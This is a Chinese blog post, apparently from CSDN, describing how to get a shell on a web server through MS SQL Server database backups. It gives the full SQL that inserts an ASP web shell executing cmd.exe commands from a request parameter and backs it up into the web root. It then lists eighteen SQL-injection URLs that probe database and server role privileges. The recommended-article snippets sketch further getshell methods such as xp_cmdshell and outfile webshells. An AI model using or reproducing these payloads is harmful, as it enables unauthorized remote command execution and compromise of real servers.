备份SQL数据库得到shell的方法:

最新推荐文章于 2024-04-12 17:26:09 发布
最新推荐文章于 2024-04-12 17:26:09 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 网络安全-实用技巧 文章标签: 数据库 shell sql database insert cmd


    动画种这种备份的方法来源于n.e.v.e.r的发明

使用语句为:
use model
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='虚拟目录的实际物理目录';

 


这个方法对数据库角色的权限要求很低,应当有db_backupoperator权限就可以了。
附上判断数据库权限的语句:(1-8是服务器角色权限,9-18是数据库角色权限判断,具体什么权限你找本书看看吧。
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_owner'));--
语句10:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_accessadmin'));--
语句11:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addadmin'));--
语句12:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addladmin'));-- 
语句13:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_securityadmin'));--
语句14:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_backupoperator'));--
语句15:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datareader'));--
语句16:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datawriter'));--
语句17:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydatareader'));--
语句18:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydadawriter'));--     

动画结束语引用n.e.v.e.r的<<Backup a shell>>中的一段原话:
 “本来这也不是什么大不了的东西,但是我写了还没有贴出来的时候,有一天QQ上居然有人神神秘秘地把这篇文章传给了我,隔了不久又有人送了我一个这方面的工具!我好感动哦,5555555~
    我也不追问他们是哪里得来的了,我给过的就几个,总是这样子传出去的吧。反正大家都知道,也没有什么好保留的,于是在黑防四期上骗了点钱,过程就是这样。”

LCX来说两句,好像n.e.v.e.r对这事公开很生气,我再做个动画,哈哈。。。。
其实asp代码写在exe里改后缀也是可以执行的。。。。。

xdfwsl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shell脚本:备份数据库、代码上线
01-20
文章目录备份MySQL数据库代码上线发布脚本 备份MySQL数据库 场景: 一台MySQL服务器,跑着5个数据库,在没有做主从的情况下,需要对这5个库进行备份 需求: 1)每天备份一次,需要备份所有的库 2)把备份数据存放到/...
sqlserver手注getshell分析:
m0_59757868的博客
08-19 2504
sqlmap
mysql数据库shell_利用数据库shell的一些姿势
weixin_34569317的博客
01-26 2115
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
shell脚本备份MySQL_shell脚本实现mysql备份
最新发布
2401_84254343的博客
04-12 515
在实现“准备”的过程中,innobackupex通常还可以使用–use-memory选项来指定其可以使用的内存的大小,默 认通常为100M。如果有足够的内存可用,可以多划分一些内存给prepare的过程,以提高其完成速度。innobackupex命令的–copy-back选项用于执行恢复操作,其通过复制所有数据相关的文件至mysql服务器 DATADIR目录中来执行恢复过程。innobackupex通过backup-my.cnf来获取DATADIR目录的相关信息。
SQL Server从0到1——写shell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-07 797
exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是写shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据。注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复。
记一次堆叠注入拿shell的总结
jklbnm12的博客
08-29 864
菜鸡第一次实战中碰到mssql的堆叠注入,大佬们轻喷。 本来对堆叠注入没啥了解,这次正巧碰到mssql的堆叠注入,正好加强一下对堆叠注入的理解。 堆叠注入 因为在sql查询语句中, 分号“;”代表查询语句的结束。所以在执行sql语句结尾分号的后面,再加一条sql语句,就造成了堆叠注入。 这种情况很像联合查询,他们的区别就在于联合查询执行的语句是有限的,只能用来执行查询语句,而堆叠注入可以执行任意语句。【零基础点这】 菜鸡不会审计php代码,这里就不贴sql语句的源码了。 下面是渗透流程 先fofa批量找一下
SqlServer备份数据库的4种方式介绍
01-21
1.用sqlserver的维护计划 ...2.通过脚本+作业的方式备份数据库(非xp_cmdshell)。如果是多个库的话自己写个游标用动态sql的方式即可实现多库备份,我这里就提供个思路偷懒就不整理了。 代码如下:  
两个备份数据库shell脚本
09-15
本文将详细介绍两个用于备份数据库Shell脚本,它们都是Linux环境下实现数据库备份的工具。这些脚本主要用于MySQL数据库,但基本原理适用于其他数据库系统,只需进行适当修改。 **备份数据库Shell脚本一** 这...
SQL_server_2005数据库异地备份方法.doc
06-03
SQL Server 2005异地备份数据库管理中的一项重要操作,目的是为了保障数据的安全性和在主数据库服务器出现问题时能够快速恢复。以下是对标题和描述中所述知识点的详细解释: 1. **异地备份**:异地备份是指将...
一种将SQL数据库远程备份与恢复的方法.pdf
09-19
SQL 数据库远程备份与恢复方法SQL Server是一种强大的关系型数据库管理系统,广泛应用于各种规模的组织中。数据库备份和恢复是确保数据安全性和业务连续性的重要环节。本文将详细探讨一种针对SQL Server...
shell 备份数据库
02-22
shell 脚本备份数据库,解压后,修改数据库配置信息,添加定时任务
【知识整理】利用SQL语句写shell方法
命运的旋律的博客
03-22 3494
利用SQL语句写shell方法 要利用sqlshell就需要在配置中满足以下条件: 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。 未开启全局GPC 关于mysql的secure_file_priv属性得多说几句 当secure_file_priv为空时,mysql对导入导出文件是没有限制的 ...
#shell 使用shell编写一个自动备份数据库的脚本
小王bro的博客
03-13 4621
前言 这是一个基于shell编写能定期对数据库进行备份的bash脚本,在系统实际运行中,总会有各种意想不到的可能使系统宕机,对数据库进行定期的备份可以最大程度的减少宕机造成的损失,保障数据。 环境 Linux Fullmultiusermode、Mysql 5.7、Shell 编写代码 准备阶段 新建数据库备份文件保存的目录,然后再新建一个目录用来存放shell脚本文件,这里我选择在home目录下新建一个shcode作为我存放s...
MySQLShell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4697
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
如何高效的使用PowerShell备份数据库
qq_43966957的博客
12-24 852
我希望利用PS来备份数据库的指令Backup-SqlDatabase cmdlet 能够给大家提供便利。提供给大家一个比起T-sql更便捷的方式。同时可以用它来输出T-sql语句。本文中显示的所有代码都是使用SqlServer PowerShell模块完成的,该模块使用SSMS 2016(16.5+),而我的机器运行的是PowerShell的5.1版本。除此之外我还测试了2012 在PS3.0也是可行的。
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
数据库备份拿webshell简单记录
weixin_34306676的博客
09-02 362
数据库备份拿webshell主要前提是能进入到应用系统后台,并且有数据库备份功能(有点废话了)!当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell!首先我们上传...
mssql差异备份shell
一个码农的笔记
03-08 5314
(1)首先: declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s; 注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换 这里的数据库名字是:Newpor
数据库备份拿webshell
weixin_41657031的博客
01-13 1291
数据库备份拿webshell 原理 ​ 数据库备份拿webshell主要前提是能进入到应用系统后台,并且有数据库备份功能。 ​ 当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell! ​ 首...
shell脚本:备份数据库MYSQL
06-12
好的,下面是备份 MySQL 数据库shell 脚本: ``` #!/bin/bash # 定义备份目录 backup_dir="/backup/mysql" # 定义备份文件名(以当前日期作为文件名) backup_file="$backup_dir/mysql_$(date +%Y%m%d).sql" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值